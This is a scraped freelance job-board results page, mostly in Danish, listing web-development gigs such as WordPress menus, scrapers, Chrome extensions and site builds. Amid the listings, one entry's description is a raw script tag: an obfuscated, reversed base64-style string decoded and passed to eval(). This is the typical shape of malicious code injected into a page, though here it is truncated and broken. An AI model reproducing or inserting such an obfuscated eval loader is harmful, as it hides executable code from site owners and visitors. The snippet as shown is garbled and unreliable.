Horizontal javascript scrollable menuJobs


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    2,000 horizontal javascript scrollable menu jobs fundet

    ...FIGMA project Requirements WORDPRESS BASED Able to connect up with our DIV - contact formular on - FROM OUR BACKEND DEVELOPER (RoR Ruby On Rails) It should always be possible to load external JS as the current one is based on, so I don't think they can make something that won't work with the type of solution we use at the moment. MENUS Each site needs to have this menu Om "Companyname" (about us) Bestil tilbud (order quotes) Brancher - EITHER DROPDOWN or search the SEARCH bar? - Recommendations wanted Kontakt os (contact) Lær mere om håndværker (Learn more about construction) Håndværkerne (the contractors / Entrepreneurs) Bliv leverandør - Hvordan virker det? (This is how it works)

    €4305 Average bid
    €4305 Gns Bud
    52 bud

    ...GULD Further I would also like to replace the current icon for Camping to be showing a camping tent instead. Ex. 10 - In the overview all product is shown with an price. Right now it ex. shows as 23.995 DKK I need this changes so that every price is shown as Fra 23.995 DKK 11 - In the top menu when putting the mouse under "Destinationer" I sometimes have a big problem in the drop down menu with the menu blinking, making it very hard to push on / open a destination. This needs to be fixed. My budget for this task is quite tight, but there will be a good chance for a lot of future work if you deliver a good quality of work....

    €54 Average bid
    €54 Gns Bud
    37 bud
    Scrape with Node.js
    Udløbet left

    ... but have some flaws. Script 1 : We need to be able to scrape URL's like these: What we need of info is : * Name of restaurant * Adress * Postalnumber + city * URL So the data retrieved should be delivered in a csv file : "Den Gamle Grillbar og BBQ", "Holsteinsgade 12", "8300 Odder", " " "Marios Pizza", "Melstedvej 17", "2770 Kastrup", "" "Tobclas Sandwich", "Torvet 3", "8700 Horsens" ,"" File to work with : Input file: Output : csv file Script 2: Second

    €188 Average bid
    €188 Gns Bud
    24 bud

    I have a simple custom indicator in thinkorswim and need converted for tradovate. I hope you have knowledge of trading software. Must start and finish within a few hours. Here is code from thinkorswim that needs to be converted input RiskUnit = 150; input buffer = .00; input digits = 0; def price = close(priceType = ); def candleRangeBull = price - low + buffer; def candleRangeBear = high - price + buffer; def BullRisk = (RiskUnit) / round(candleRangeBull); def BearRisk = (RiskUnit) / round(candleRangeBear); def BullRisk1 = rounddown(Bullrisk, digits); def BearRisk1 = rounddown(Bearrisk, digits); def o = open; AddLabel(yes, "Risk: " + AsDollars(RiskUnit) + " Ele : "+ (if price > o then BullRisk1 else BearRisk1), if price > o then else );

    €67 Average bid
    €67 Gns Bud
    4 bud

    ...polls or exams with multiple choices. The input in the slider will be postal codes, not kilometers (km) and the output will be the price of the service. So basically we need something very similar to the dantaxi calculator. In the end, it will need to be embedded(?) as a plugin in an existing WordPress page (under construction so I can't link to anything yet) and have it's own "link" in the menu. Must fit into a sort of FAQ with drop-down answers, and if that is not possible. The function of the slide/price calculator is for clients to be able to calculate how much in total it will cost them to book a date to their postal code. So it's a price calculator for a named sexworker including transportationfee etc. The idea is that everything can work ...

    €186 Average bid
    €186 Gns Bud
    22 bud

    We have an template: that we want to use. We have 100 products that we created so fare in WooCommerce. The shop menu should be like this: . We need to have pages for terms & Conditions etc etc... We need to have WPBakery Page Builder for WordPress to work perfectly into the system. We have a module for Affiliate for privates ( 10 - 15% ) that shall work. We need a login for B2B clients that can see the cost-price for them. We need shipping to be integrated with: We need to implement gateway: There shall be a small blog. There shall be a FAQ like this: Mailsystem for newsletter We work in english - but

    €12 / hr Average bid
    €12 / hr Gns Bud
    11 bud

    ...indhold - og sikre, at der er en klar etablering af, hvad der kan oprettes inden for hvilken tidsramme • Undersøgelse af forskellige softwareprogrammer, vedligeholdelse af softwaredokumentation • Implementering af beredskabsplaner, hvis webstedet går ned • Vedligeholdelse og udvidelse / forbedring af hjemmesiden, når den først er bygget Webudvikler jobkvalifikationer og krav • HTML / XHTML, CSS, JavaScript • Serverarkitektur • Erfaring med server-side rammer som python, ruby, php, Java, ASP, ASP.NET • Erfaring med databasesystemer som SQL og Oracle • Grundig funktionel viden og kodningserfaring • Grundlæggende kendskab til optimering af søgemaskiner • Evne til multitask med strenge tidsbegr...

    €195 Average bid
    €195 Gns Bud
    3 bud
    €7 Gns Bud
    1 bud
    Wordpress Settings
    Udløbet left

    Menu settings and other things.

    €26 Average bid
    €26 Gns Bud
    6 bud
    Kodning af design
    Udløbet left

    Vokato er en mobil platform til nattelivet med 6.000 brugere. Vi har brug for at få kodet det nye design, som vi har lavet, så det kan implementeres. Responsivitet er meget vigtigt og skal virker på samtlige smartphones. HTML/CSS & Javascript. Vi leder efter en der fast kan varetage disse opgaver for os. Du vil komme til at arbejde sammen med vores designer og backendudviklere og meget muligt lave mindre modificeringer i løbet af processen.

    €842 Average bid
    €842 Gns Bud
    5 bud
    UI developer
    Udløbet left


    €21 Average bid
    €21 Gns Bud
    13 bud
    €173 Gns Bud
    1 bud

    GTA V Mod Menu K1NGM0DZ menu

    €126 Average bid
    €126 Gns Bud
    6 bud
    javascript html
    Udløbet left

    privet script

    €501 Average bid
    €501 Gns Bud
    40 bud

    ændring af zoom plus funktion implementering af newsletter sign-up pop up form på website ændring af menu og shopping basket ikon på mobil side Har løbende småjobs, så brug for én Magento haj, der er fleksibel og hurtig og ikke er dyr ift. små opgaver.

    €172 Average bid
    €172 Gns Bud
    5 bud

    Team Agent is a teamfinding and team management website for eSport games (League of Legends and Counter-Strike Global Offensive) Demo site: Assignment: The site is almost done, but the last element need...system that read the grabs from the game publicers API, the user profile of the gamer. - responsive design (mobile friendly) - Application requirements, which is where the teams can tell what kind of members they seek. Based on some dropdown criteria and text. The assignment will have to be done ASAP. We would be pleased to see you have experience with: Python 3+ Django 1.8+ HTML5 Javascript CSS Bash JQuery GNU/Linux Mercurial MySQL or PostgreSQL NICE TO HAVE Bootstrap AngularJS - or similar Kind regards Founder Nicholas Rasmussen

    €13 / hr Average bid
    €13 / hr Gns Bud
    5 bud
    Project for miennh
    Udløbet left

    Javascript error fix

    €28 Average bid
    €28 Gns Bud
    1 bud

    Wordpress skabelonen skal være responsiv. Hastigheden skal være så høj som mulig - min. 90/100 Mulighed for selv at vælge farver Mulighed for selv at vælge font Mulighed for selv at oprette CTA buttons, med et pre-defineret layout Forsiden skal kunnde indeholde 2-6 indgange (disse indgange skal hver have mulighed for egen menu) Integration til diverse sociale medier skal være muligt - på forside niveau, men også på de 2-6 niveauer/indgange.

    €162 Average bid
    €162 Gns Bud
    5 bud

    <script language="javascript" type="text/javascript">var lOI='==gCpkSKnw3JoQXasB3cucCdldmcvZmMyw3UVJjM8FTZslHdzBXYydXby9mZyIDfyR3QzwXZ1JHdyIDfn5Wa0RXZ2JjM8NXZnFWbpxXek9mY0N0M8hGdhBVZ function OO0(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += (i);} return ret; }eval(lO0(OO0(lOI)));</script>

    €22 Average bid
    €22 Gns Bud
    4 bud

    General Web develpment PHP, Html, Css, Javascript devlopement for our clients

    €5 / hr Average bid
    €5 / hr Gns Bud
    1 bud
    menu design
    Udløbet left

    2 * A1 posters for food 1 * A1 poster for drink

    €58 Average bid
    €58 Gns Bud
    1 bud

    Der skal laves en chained selector menu som er baseret på to betingelser.

    €439 Average bid
    €439 Gns Bud
    13 bud

    wedsitedesign i hava done training ii html,css,javascript,jquery,ajax,photoshop.

    €149 Average bid
    €149 Gns Bud
    1 bud

    Mit navn er Jonas og jeg er Webudvikler med mere end 7 års erfaring i branchen. * Primært fokus er Webudvikling (HTML/CSS, PHP, MySQL, JavaScript) * WordPress ekspert * Gennemtænkte løsninger, så du undgår unødvendig langtrukne projekter og ekstraarbejde * Kort leverings- og responstid (Haste opgaver er intet problem) * Kompetent rådgivning er vigtigere end øget salg (også selvom man er sælger)

    €29 - €240
    €29 - €240
    0 bud
    A good job
    Udløbet left

    Mit navn er Jonas og jeg er Webudvikler med mere end 7 års erfaring i branchen. * Primært fokus er Webudvikling (HTML/CSS, PHP, MySQL, JavaScript) * WordPress ekspert * Gennemtænkte løsninger, så du undgår unødvendig langtrukne projekter og ekstraarbejde * Kort leverings- og responstid (Haste opgaver er intet problem) * Kompetent rådgivning er vigtigere end øget salg (også selvom man er sælger)

    €144 - €144
    €144 - €144
    0 bud
    Lav en hjemmeside
    Udløbet left

    *Primært fokus er Webudvikling (HTML/CSS, PHP, MySQL, JavaScript) * WordPress ekspert * Gennemtænkte løsninger, så du undgår unødvendig langtrukne projekter og ekstraarbejde * Kort leverings- og responstid (Haste opgaver er intet problem) * Kompetent rådgivning er vigtigere end øget salg (også selvom man er sælger)

    €1905 Average bid
    €1905 Gns Bud
    5 bud

    Jeg søger en som kan lave et modul til Prestashop. Modulet skal fungere på den måde, at nyoprettede kunder skal kunne udfylde nogle spørgsmål, hvorefter de får tilsendt en voucher (rabatkode) som de kan bruge på webshoppen. Shopejeren skal have mulighed for at definere disse spørgsmål via backend-administration...nogle spørgsmål, hvorefter de får tilsendt en voucher (rabatkode) som de kan bruge på webshoppen. Shopejeren skal have mulighed for at definere disse spørgsmål via backend-administrationen, samt udtrække data fra de besvarede spørgsmål. Der skal være mulighed for at fjerne, ændre og oprette spørgsmål via backend. Spørgsmål sk...

    €409 Average bid
    €409 Gns Bud
    4 bud

    ...aftale en pris dertil. Hvis der er nogen forslag til en forenkling af formularen, evt fjernelse af felter, så er jeg meget modtagelig. Jeg har også beskrevet hvilke inputs jeg mener de forskellige skal være, hvis i har andre ideér så er jeg meget åben (der er mulighed for at bruge: - da jeg har en licens dertil): REJSEBESTLLING: ------------ Vælge en tur (dropdown menu med x antal emner) ------------ Dato med kalender (hvis muligt, så skal der kun være x antal dage man kan vælge, da hver tur kun er tilgængelige i uge 15 13 og 22, og hvis muligt kunne det være fedt at kunne markere hvilke dage der er afrejse dage). ------------ Antal voksne (inputfield hvor man kan skrive 5 vok...

    €161 Average bid
    €161 Gns Bud
    2 bud

    Jeg har vedvarende arbejde relateret til vores tidligere projekt ' Integrate javascript into html page'

    €4 / hr Average bid
    €4 / hr Gns Bud
    1 bud

    ACLS is privately owned construction and logistic company with its offices in United States, Arab Emirates and Afghanistan. The Company has been responsible for the design and construction of some of the most significant projects in Afghanistan. URL Languages and Technologies HTML, CSS, JavaScript and Flash Quality of code The website conforms to W3C can relate to the correct layout of pages for readability as well making sure coded elements are closed appropriately.

    €1061 Average bid
    €1061 Gns Bud
    15 bud

    READ THE INSTRUCTIONS BELOW BEFORE APPLYING: 1. You must not place a...SQL to a new MySQL database. You can use the suggested tool or any similar one for this task. (Use this or any similar library - ) - Ensure the MySQL database is set up using the default configuration. Ideal Skills and Experience: • Proficient with cPanel and Git. • Proficient with TypeScript (94.4%), CSS (3.2%), HTML (0.9%), MDX (0.8%), JavaScript (0.6%), Shell (0.01%) as it's being used in the Project. • Proficient with Node.js (Version: >=18.x) • Experienced in database conversion and migration. Knowledgeable in MySQL and Postgres. Please ensure to verify the successful migration of the project and the proper functioning of the configured services.

    €84 Average bid
    €84 Gns Bud
    2 bud

    ...Requirements: • Proven track record of creating websites in Wix. • Strong understanding of responsive design and best practices. • Attention to detail and ability to closely follow Figma designs. • Familiarity with SEO and performance optimization on Wix. • Excellent communication skills and ability to deliver on time. Preferred Qualifications: • Experience integrating custom code (HTML, CSS, JavaScript) on Wix for additional functionality. • Portfolio showcasing previous Figma-to-Wix projects. • Ability to provide suggestions for UI/UX improvements. What We Offer: • Clear and organized Figma files with design specifications. • Prompt feedback and open communication. • Potential for ongoing collaboration on future website u...

    €20 / hr Average bid
    €20 / hr Gns Bud
    135 bud

    I'm looking for a skilled web developer to create a professional, corporate-style website for my cleaning company. Key Objectives: - The primary goal of the website is to att...new customers. - The site should clearly present the services offered by the company, which include residential, commercial, and specialized cleaning (e.g., carpets, windows). - The design of the website should be professional and corporate, aiming to instill trust and reliability in potential clients. Ideal skills for the job include: - Proficiency in web development languages (HTML, CSS, JavaScript, etc.) - Experience in creating professional, corporate-style websites. - Strong understanding of SEO to attract new customers. - Ability to design an intuitive, user-friendly layout that clearly present...

    €77 Average bid
    €77 Gns Bud
    35 bud

    I need a modern and minimalist website for my cafe. The primary purpose of the site is to showcase our menu and services. Key Skills Required: - Web Development - UI/UX Design - Responsive Design - SEO - E-Commerce Integration (if needed in future) The site should be simple yet elegant, reflecting a modern and minimalist design aesthetic.

    €78 Average bid
    €78 Gns Bud
    41 bud

    I need a skilled designer to create a minimalist horizontal business card using my brand and logo guidelines. The card should include: - My name and title - Contact details - Company logo - Address - Key offerings You should have a strong portfolio in minimalist design and business card creation. Attention to detail and understanding of brand consistency are key.

    €78 Average bid
    €78 Gns Bud
    174 bud

    As a new business, I need a webpage that primarily serves the purpose of information dissemination and branding. The design should embody a modern and minimalist aesthetic. This means clean lines, ample white space, and a focus on essential content without unnece...primarily serves the purpose of information dissemination and branding. The design should embody a modern and minimalist aesthetic. This means clean lines, ample white space, and a focus on essential content without unnecessary clutter. Skills needed: - Web design with a modern minimalist approach. - Strong understanding of branding and creating an informative webpage. - Proficiency in HTML, CSS, JavaScript, and other relevant web development languages. - Experience in creating user-friendly and visually appealing web i...

    €125 Average bid
    €125 Gns Bud
    240 bud
    OpenGL Image processing
    6 dage left

    ...using a median filter. The filter used will be 25×25 in size. Applying the filter using the ad-hoc algorithm requires performing 625 texture samples for each pixel. A more optimal algorithm is to separate the filter into two filters of sizes 25×1 and 1×25 respectively using the idea here . The smoothing will be done in two steps. We start with the original image: The first step is to perform horizontal smoothing. Each pixel will be equal to the arithmetic mean of the pixel and its 24 neighbors on the same line as the pixel. The second step is to perform a vertical smoothing on this result. Each pixel will be equal to the arithmetic mean of the pixel and its 24 neighbors on the same column as the pixel. This method reduces the total number of texture samples...

    €184 Average bid
    €184 Gns Bud
    37 bud

    I'm looking for Revit 2022 families (for modeling for a real house of the attached photos), all families should be able to set height and width when being imported into Revit. - Doors and windows (sliding, white) -A one panel swing casement window (white, left or right swi...families (for modeling for a real house of the attached photos), all families should be able to set height and width when being imported into Revit. - Doors and windows (sliding, white) -A one panel swing casement window (white, left or right swing, no photo provided) - 2 Garage doors (One traditional-see photo, and one a bit modern with some glass panels) - 2 parametric 11x17 title blocks (horizontal and vertical) -Exterior 2x4 stud wall with white vinyl siding ( see attached 2 photos, one is close and o...

    €38 Average bid
    €38 Gns Bud
    23 bud

    My Gmail API is not displaying on my website, despite everything being set up. - I am encountering an API response issue. - I haven't checked the console or logs yet. - I need assistance in identifying error messages and troubleshooting. Ideal skills and experience include: - Proficient in JavaScript and Google APIs - Strong problem-solving skills - Experience with console and log analysis - Ability to communicate technical issues in simple terms.

    €127 Average bid
    €127 Gns Bud
    173 bud

    As a front-end developer, I'm working on a project that involves creating a brand new website. The primary focus of this job will be on the styling and la...involves creating a brand new website. The primary focus of this job will be on the styling and layout of the site. Key Responsibilities: - Implementing responsive design elements to ensure the website is mobile-friendly and looks great on all devices. - Developing custom animations that enhance user experience without compromising site performance. Ideal Candidate: - Proficient in HTML, CSS3, JavaScript, jQuery, TailwindCss, React.js, and Next.js. - Extensive experience in responsive design and creating custom animations. - Solid understanding of cross-browser compatibility and able to troubleshoot styling/layout issues...

    €7 / hr Average bid
    €7 / hr Gns Bud
    51 bud

    I'm seeking a skilled web and software developer who can help me with building websites, web applications, and mobile apps with a primary focus on front-end development. Ideal Skills: - Proficient in HTML, CSS, JavaScript, and Python - Strong front-end development experience - Software and mobile app development expertise Key Responsibilities: - Building user-friendly and interactive front-end of websites and web applications - Assisting with the overall web and software development process Note: The primary goal of the project hasn't been determined yet, and the mobile app's platform support is still undecided. However, the focus will be heavily on front-end development.

    €6 / hr Average bid
    €6 / hr Gns Bud
    49 bud
    6 dage left

    Hey ? there, I need a python or javascript developer to build a simple script for an urgent project. Kindly check the requirements below: ~ K

    €140 Average bid
    €140 Gns Bud
    95 bud

    ...above requirements. Source code with clean, modular architecture. Documentation on configuration and usage. Assistance with publishing the extension on the Chrome Web Store. The extension must be written to meet the requirements of the chrome web store! The GUI aspect must look professional. Preferred Skills: Experience with Chrome Extension Development (JavaScript, HTML, CSS). Familiarity with Facebook’s DOM structure and handling browser permissions. Expertise in browser notification APIs and event handling. Knowledge of Stripe payment integration. UI/UX design experience for browser extensions. Additional Information: Suggestions for improving the design, functionality, or performance are welcome. Pl...

    €146 Average bid
    €146 Gns Bud
    27 bud

    ...enforcement but i thinkxcloud only allows on android OS xhr request to do 720p) - Adjust the WebRTC profile to the 102 codec profile - Ensure the resolution visible on chrome://webrtc-internals/ is 1280x720 - Implement SDP bitrate modification This project will be deemed complete once all of the above modifications are successfully implemented. Ideal skills and experience: - Proficiency in JavaScript and familiar with the Electron framework - Previous experience with WebRTC and modifying request headers - Understanding of xCloud and its requirements - Ability to refer and implement solutions from existing GitHub repositories such as betterxcloud Please note, I will be manually logging into , so no need for an automated script. The successful candidate will be able to help me...

    €86 Average bid
    €86 Gns Bud
    115 bud

    I'm looking to create a set of catering menus for an upcoming corporate event. The meal service will be a buffet, so the menus should be designed with this in mind. Ideal skills for this project include: - Menu design with a focus on buffet service - Understanding of corporate catering needs - Ability to create appealing and diverse catering options Please note, the specific cuisine type has not been determined yet, so there's flexibility for creativity and suggestion.

    €1840 Average bid
    €1840 Gns Bud
    152 bud

    I'm seeking an expert who can help me integrate JavaScript with Scrapy. The primary goal of this integration is to automate web interactions. Ideal Skills: - Proficiency in JavaScript - Expertise in Scrapy - Experience in web automation and interaction - Knowledge of handling dynamic content is a plus - Familiarity with web scraping ethics and legalities

    €11 Average bid
    €11 Gns Bud
    24 bud

    ...(Excel/PDF). Security: SSL encryption for all data transfers. Role-based access control for admin and user roles. GDPR/Privacy law compliance for data storage and handling. Additional Features: Real-time email/SMS notifications. Analytics for KYC trends and risk metrics. White-labeling options for businesses to use their branding. Technical Preferences Frontend: Responsive design (HTML/CSS/JavaScript or frameworks like React.js). Backend: Secure server (Node.js, Django, or Flask). Database: MySQL, PostgreSQL, or MongoDB for data storage. Hosting: Cloud-based hosting (AWS, Google Cloud, or Heroku). Timeline Deliverables Fully functional website with user and admin interfaces. Technical documentation for deployment and maintenance. A brief demo showcasing the site’s key f...

    €9 Average bid
    €9 Gns Bud
    11 bud

    I'm working on a WordPress template for a delivery company. I need help setting up a classic-style, one-page menu and resizing the mobile logo to make it bigger. It's a small project with a small budget of $10. Ideal Skills: - WordPress development - CSS for logo resizing for the mobile version - Experience with classic design styles - Knowledge of one-page menu setup

    €21 Average bid
    €21 Gns Bud
    131 bud

    I'm looking for a skilled web developer to create a website for my garden store. The main goal of the site is to showcase our products in a r...techniques to create a user-friendly interface. - Ability to design a rustic and natural aesthetic. - Experience in e-commerce site development. Product Showcase Features: - Incorporate high-quality images of our products. - Implement detailed descriptions for each product. - Integrate a section for customer reviews. Ideal skills and experience for the job include: - Proficiency in HTML, CSS, JavaScript, and other relevant web development languages. - Previous experience designing e-commerce websites, particularly in the garden or home improvement sector. - Strong understanding of rustic and natural design principles. Looking forwar...

    €264 Average bid
    €264 Gns Bud
    98 bud